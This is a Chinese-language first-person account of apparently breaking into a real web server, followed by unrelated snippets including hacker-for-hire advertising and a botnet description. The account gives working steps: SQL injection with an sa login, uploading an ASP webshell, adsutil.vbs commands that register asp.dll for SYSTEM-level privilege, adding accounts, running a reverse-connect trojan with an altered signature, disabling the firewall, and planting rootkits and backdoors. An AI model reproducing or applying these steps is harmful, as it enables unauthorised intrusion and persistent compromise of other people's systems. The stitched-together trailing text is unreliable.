ping
[url=http://www.xxx.com]www.xxx.com[/url]
发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。
二、注入
从源文件里搜索关键字asp,找到了一个注入点。用nbsi注入,发现是sa口令登陆,去加了一个用户,显示命令完成。哈哈,看来管理员太粗心了。先上传一个webshell,上传了一个老兵的asp木马,接下来的就是个人习惯了,我平时入侵的习惯是先上传webshell,然后再把webshell提升为system权限,因为这样说可以说在入侵之时会非常的方便,我个人觉得这个 *** 非常好。
三、提升权限
先看哪些特权的:
cscript C:\Inetpub\AdminScripts\adsutil.vbs get /W3SVC/InProcessIsapiApps
得到:
Microsoft (R) Windows 脚本宿主版本 5.1 for Windows
版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.
InProcessIsapiApps : (LIST) (5 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"
把把asp.dll加进去:
cscript C:\Inetpub\AdminScripts\adsutil.vbs
set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32
\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32
\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32
\inetsrv\asp.dll"
然后用asp木马加个用户,显示命令完成。
四、TerminalService
接下来就是开3389了,用net start显示,发现已开了TS服务,但端口上没有3389,觉得可能是改端口了,但事实上它们欺骗我的感情。
我用netstat -an察看了一下,发现有3389,再从net start 里发现是对方的防火墙搞的鬼。算了,上传个木马吧,上传了一个改了特征码的20CN反弹木马。然后用木马在GUI 下关掉了防火墙,再用3389登陆器登了上去。这里我这样做是因为我知道管理员一定不会在旁边,而对于这个时候,比较老道的 *** 大家可以用fpipe实现端口重定向,或者用httptunnel,和黑防里面说的那样,不过我试过没有成功过一次。还有一种工具是despoxy,(TCP tunnel for HTTP Proxies),大家有兴趣的话可以去试一下,它可以穿透http *** 。
五、简单后门
1、改了FSO名,这样是让我自己享受,这个有system权限的马儿。
2、放了几个rootkit和几个 *** 上少见的后台。
3、我个从是不喜欢多放后台,觉得很烦。
六、sniffer
1.TS界面下,down了些嗅探器。先ARPsniffer图形的看了一下,没有一台内网机子。又看了一个外网,整个IP段都是。看来我的运行不错嘛。打开webdavscan查了一下,只有两三个IP是网站,而且是很小型的,接下来就没有什么动力了。
美国杀毒软件排行榜(这5款才是真正的杀毒软件) 羽度非凡和大多数有一样的错觉,就是感觉自从杀毒软件免费之后,病毒和木马好像越来越少了,好不容易遇到杀毒软件报警,发现原来是“误报”,但在几年前,最受欢...
2021新年微信朋友圈置顶文案你想要吗,下面分享的是最新微信置顶可爱说说大全,希望你能喜欢哦。 1.保持心脏振动,并有人与您共鸣。 2.清醒,知道兴趣,知道得失,知道如何前进和后退。 3.微风的声音叫...
目标接口:https://h5.pipix.com/bds/webapi/item/detail/?item_id= id根据301跳转后截取item/ 和?中间的值 curl模拟设备获取数据 然...
一、如何联系黑客帮忙(如何联系到黑客)方法总结 1、如何可以联系到一些骇客?看你的目的了去一些专业的黑客论坛那里很多比如你想免杀东西就去甲壳虫黑客怎么联系我估计你要是知道怎么联系的话,你离黑客也不远...
如上图所示,感染用户成为僵尸署理节点后不只会被占用很多网络资源被用于流量暗刷,更大的网络安全隐患在于,感染主机直接暴露在病毒构建的巨大V PN 虚拟局域网内,而该V PN 网络的接入暗码凭据是硬编码在...
模拟黑客手机软件ios(黑客攻击手机软件)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、...